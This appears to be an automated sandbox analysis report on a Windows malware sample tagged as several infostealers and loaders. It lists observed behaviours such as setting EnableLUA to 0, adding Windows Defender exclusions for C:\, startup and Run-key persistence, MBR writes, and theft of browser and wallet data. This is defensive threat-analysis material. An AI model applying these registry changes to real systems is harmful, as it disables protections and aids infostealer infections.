Malware Analysis Report

2024-07-11 11:02

Sample ID 240530-c5wswabe8s
Target 06017fe4a67a0208ed4f7d47eb8429890ce13032d19e1e7c003798bbc29750c8
SHA256 06017fe4a67a0208ed4f7d47eb8429890ce13032d19e1e7c003798bbc29750c8
Tags
amadey lumma privateloader redline risepro stealc 0e6740 1 49e482 @logscloudyt_bot zzvv bootkit discovery evasion execution infostealer loader persistence spyware stealer themida trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

06017fe4a67a0208ed4f7d47eb8429890ce13032d19e1e7c003798bbc29750c8

Threat Level: Known bad

The file 06017fe4a67a0208ed4f7d47eb8429890ce13032d19e1e7c003798bbc29750c8 was found to be: Known bad.

Malicious Activity Summary

amadey lumma privateloader redline risepro stealc 0e6740 1 49e482 @logscloudyt_bot zzvv bootkit discovery evasion execution infostealer loader persistence spyware stealer themida trojan

Windows security bypass

Stealc

RisePro

RedLine payload

Modifies firewall policy service

RedLine

PrivateLoader

Lumma Stealer

Amadey

UAC bypass

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Downloads MZ/PE file

Checks BIOS information in registry

Reads data files stored by FTP clients

Windows security modification

Executes dropped EXE

Identifies Wine through registry keys

Drops startup file

Loads dropped DLL

Checks computer location settings

Themida packer

Reads user/profile data of web browsers

Writes to the Master Boot Record (MBR)

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Drops desktop.ini file(s)

Checks installed software on the system

Accesses cryptocurrency files/wallets, possible credential harvesting

Drops Chrome extension

Checks whether UAC is enabled

Adds Run key to start application

Suspicious use of SetThreadContext

Drops file in System32 directory

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in Program Files directory

Drops file in Windows directory

Enumerates physical storage devices

Program crash

Unsigned PE

Modifies system certificate store

Enumerates system info in registry

Checks processor information in registry

Suspicious use of SendNotifyMessage

Modifies data under HKEY_USERS

Suspicious use of AdjustPrivilegeToken

Creates scheduled task(s)

System policy modification

Suspicious use of WriteProcessMemory

Delays execution with timeout.exe

Checks SCSI registry key(s)

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

MITRE ATT&CK Matrix V13

Analysis: static1

Detonation Overview

Reported

2024-05-30 02:40

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-30 02:40

Reported

2024-05-30 02:42

Platform

win10v2004-20240508-en

Max time kernel

149s

Max time network

157s

Command Line

"C:\Users\Admin\AppData\Local\Temp\06017fe4a67a0208ed4f7d47eb8429890ce13032d19e1e7c003798bbc29750c8.exe"

Signatures

Amadey

trojan amadey

Lumma Stealer

stealer lumma

Modifies firewall policy service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" C:\Users\Admin\Pictures\GlOTmB1OLvtHJASSSXCHFWMv.exe N/A

PrivateLoader

loader privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RisePro

stealer risepro

Stealc

stealer stealc

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1" C:\Users\Admin\Pictures\GlOTmB1OLvtHJASSSXCHFWMv.exe N/A

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1000005001\3ffd83c1a0.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Pictures\GlOTmB1OLvtHJASSSXCHFWMv.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\06017fe4a67a0208ed4f7d47eb8429890ce13032d19e1e7c003798bbc29750c8.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\1000004002\0869e0ea89.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Downloads MZ/PE file

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\06017fe4a67a0208ed4f7d47eb8429890ce13032d19e1e7c003798bbc29750c8.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1000005001\3ffd83c1a0.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\06017fe4a67a0208ed4f7d47eb8429890ce13032d19e1e7c003798bbc29750c8.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\1000004002\0869e0ea89.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Pictures\GlOTmB1OLvtHJASSSXCHFWMv.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1000005001\3ffd83c1a0.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\1000004002\0869e0ea89.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Pictures\GlOTmB1OLvtHJASSSXCHFWMv.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zSED68.tmp\Install.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\1000004002\0869e0ea89.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zSED68.tmp\Install.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\06017fe4a67a0208ed4f7d47eb8429890ce13032d19e1e7c003798bbc29750c8.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2I3Dpn1n9twDM8B0Noo8MrsJ.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FzGh3IbIVndMAjaAvbCaqKDS.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JuISH5MtYdVy37r5ZyVVjAYK.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Task Manager.lnk C:\Users\Admin\Pictures\iR1RDwYXPTmcKLiz2pyjsa5N.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\2iPQtGlebLsn6Pdza6xipLaV.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\smoAxtWbhsqvyUzBeMhPenqt.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TIssk4QAYpbldUs5QXJhFEq8.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
N/A N/A C:\Users\Admin\1000004002\0869e0ea89.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000005001\3ffd83c1a0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000004001\33333.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000005001\fileosn.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\svhoost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\configurationValue\One.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000006001\lumma1234.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000008001\gold.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000009001\swizzzz.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A
N/A N/A C:\Users\Admin\Pictures\79AxFRg8VecFbI3ZhvCwd6kV.exe N/A
N/A N/A C:\Users\Admin\Pictures\ZwkvhQdl3d2GrfeBnBZDHvx1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
N/A N/A C:\Users\Admin\Pictures\iR1RDwYXPTmcKLiz2pyjsa5N.exe N/A
N/A N/A C:\Users\Admin\Pictures\GlOTmB1OLvtHJASSSXCHFWMv.exe N/A
N/A N/A C:\Users\Admin\Pictures\1sV0V74o6XuxHDx0lr3ZwrZy.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSE9DE.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSED68.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zSED68.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
N/A N/A C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\06017fe4a67a0208ed4f7d47eb8429890ce13032d19e1e7c003798bbc29750c8.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine C:\Users\Admin\1000004002\0869e0ea89.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1000005001\3ffd83c1a0.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\ZwkvhQdl3d2GrfeBnBZDHvx1.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Themida packer

themida
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe = "0" C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1" C:\Users\Admin\Pictures\GlOTmB1OLvtHJASSSXCHFWMv.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\3ffd83c1a0.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1000005001\\3ffd83c1a0.exe" C:\Users\Admin\AppData\Local\Temp\9217037dc9\explortu.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\1000020001\file300un.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\Pictures\GlOTmB1OLvtHJASSSXCHFWMv.exe N/A

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Users\Admin\AppData\Local\Temp\7zSED68.tmp\Install.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ipinfo.io N/A N/A
N/A api.myip.com N/A N/A
N/A api.myip.com N/A N/A
N/A ipinfo.io N/A N/A

Writes to the Master Boot Record (MBR)

bootkit persistence
Description Indicator Process Target
File opened for modification \??\PhysicalDrive0 C:\Users\Admin\Pictures\ZwkvhQdl3d2GrfeBnBZDHvx1.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini C:\Users\Admin\Pictures\GlOTmB1OLvtHJASSSXCHFWMv.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_05B056B983E25E9B4D43BC3D9283D686 C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_242CEA72AD255CEF17D8B88AD3038326 C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_91E41FAE8B0B67645773C1C9A8DB10E4 C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy C:\Users\Admin\Pictures\GlOTmB1OLvtHJASSSXCHFWMv.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_05B056B983E25E9B4D43BC3D9283D686 C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Users\Admin\Pictures\GlOTmB1OLvtHJASSSXCHFWMv.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_242CEA72AD255CEF17D8B88AD3038326 C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_91E41FAE8B0B67645773C1C9A8DB10E4 C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zSED68.tmp\Install.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E52E4DB9468EB31D663A0754C2775A04 C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\Pictures\GlOTmB1OLvtHJASSSXCHFWMv.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\7zSED68.tmp\Install.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E52E4DB9468EB31D663A0754C2775A04 C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\tegRANPZONsU2\wojZtnp.xml C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
File created C:\Program Files (x86)\YLgKyOFzWxOqC\TRIFhIf.dll C:\Windows\Temp\ZmzskowerwXEonlG\JfkETvmUyRlgORK\jfVXyYM.exe N/A
